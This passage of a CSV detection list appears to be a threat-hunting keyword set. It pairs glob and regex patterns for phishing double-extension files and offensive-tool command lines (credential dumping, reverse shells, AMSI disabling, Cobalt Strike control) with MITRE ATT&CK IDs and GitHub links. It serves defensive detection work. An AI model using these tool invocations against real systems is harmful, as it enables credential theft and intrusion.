APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ppt.bat*",".{0,1000}\.ppt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*.ppt.dll*",".{0,1000}\.ppt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.exe*",".{0,1000}\.ppt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.htm*",".{0,1000}\.ppt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.iso*",".{0,1000}\.ppt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.jar*",".{0,1000}\.ppt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.js*",".{0,1000}\.ppt\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.sfx*",".{0,1000}\.ppt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.ppt.vbs*",".{0,1000}\.ppt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*.pptx.bat*",".{0,1000}\.pptx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.dll*",".{0,1000}\.pptx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.exe*",".{0,1000}\.pptx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.htm*",".{0,1000}\.pptx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.iso*",".{0,1000}\.pptx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.jar*",".{0,1000}\.pptx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.jasmin*",".{0,1000}\.pptx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.pptx.js*",".{0,1000}\.pptx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious 
extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.sfx*",".{0,1000}\.pptx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pptx.vbs*",".{0,1000}\.pptx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.PrivilegeEscalation.Exchange*",".{0,1000}\.PrivilegeEscalation\.Exchange.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.ps1 -Base *OU=*DC=* -Credentials * -Server *",".{0,1000}\.ps1\s\-Base\s.{0,1000}OU\=.{0,1000}DC\=.{0,1000}\s\-Credentials\s.{0,1000}\s\-Server\s.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON 
*.json*",".{0,1000}\.ps1\s\-dcip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password.{0,1000}\s\-ExportToCSV\s.{0,1000}\.csv\s\-ExportToJSON\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*.ps1 -l -p * -r dns:::*",".{0,1000}\.ps1\s\-l\s\-p\s.{0,1000}\s\-r\sdns\:\:\:.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*.ps1 -StartWebServer Powershell*",".{0,1000}\.ps1\s\-StartWebServer\sPowershell.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.ps1 -StartWebServer Python*",".{0,1000}\.ps1\s\-StartWebServer\sPython.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - 
T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.ps1 -technique BetterXencrypt*",".{0,1000}\.ps1\s\-technique\sBetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique Chameleon*",".{0,1000}\.ps1\s\-technique\sChameleon.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique PSObfuscation*",".{0,1000}\.ps1\s\-technique\sPSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique PyFuscation*",".{0,1000}\.ps1\s\-technique\sPyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 -technique ReverseB64*",".{0,1000}\.ps1\s\-technique\sReverseB64.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*.ps1 
-WifiPasswords Dump*",".{0,1000}\.ps1\s\-WifiPasswords\sDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.py -credz *.txt * ",".{0,1000}\.py\s\s\-credz\s.{0,1000}\.txt\s.{0,1000}\s","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*.py -k * -f *.bat -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.bat\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.exe -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.js -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.js\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.pps -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.pps\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.ppsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.ppt -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppt\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.ps1 -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xll -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xll\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xls -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xls\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsb -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsb\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py rekall *.dmp* -t 0",".{0,1000}\.py\s\srekall\s.{0,1000}\.dmp.{0,1000}\s\-t\s0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*.py -t *.tpe -c *.exe* -remote-lib *-remote-target *",".{0,1000}\.py\s\s\-t\s.{0,1000}\.tpe\s\-c\s.{0,1000}\.exe.{0,1000}\s\-remote\-lib\s.{0,1000}\-remote\-target\s.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*.py * --fake-server*",".{0,1000}\.py\s.{0,1000}\s\s\-\-fake\-server.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*.py * amsi -disable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-disable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*.py * amsi 
-enable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-enable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*.py * --brop *",".{0,1000}\.py\s.{0,1000}\s\-\-brop\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*.py * --burp *",".{0,1000}\.py\s.{0,1000}\s\-\-burp\s.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*.py * coerce -computer *",".{0,1000}\.py\s.{0,1000}\scoerce\s\-computer\s.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*.py * --coerce-to *",".{0,1000}\.py\s.{0,1000}\s\-\-coerce\-to\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*.py * -debug -dnstcp*",".{0,1000}\.py\s.{0,1000}\s\-debug\s\-dnstcp.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.py * --just-coerce *",".{0,1000}\.py\s.{0,1000}\s\-\-just\-coerce\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*.py * -k -no-pass*",".{0,1000}\.py\s.{0,1000}\s\-k\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*.py * --sql-shell*",".{0,1000}\.py\s.{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*.py * --teamserver *",".{0,1000}\.py\s.{0,1000}\s\-\-teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py *.cs cs ms*",".{0,1000}\.py\s.{0,1000}\.cs\scs\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.py *.exe *NormalDLL.dll*",".{0,1000}\.py\s.{0,1000}\.exe\s.{0,1000}NormalDLL\.dll.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation
Tools","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*.py *0.0.0.0*--serve-forever*",".{0,1000}\.py\s.{0,1000}0\.0\.0\.0.{0,1000}\-\-serve\-forever.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py *--dependabot-workaround*",".{0,1000}\.py\s.{0,1000}\-\-dependabot\-workaround.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py 127.0.0.1 50050 logtracker 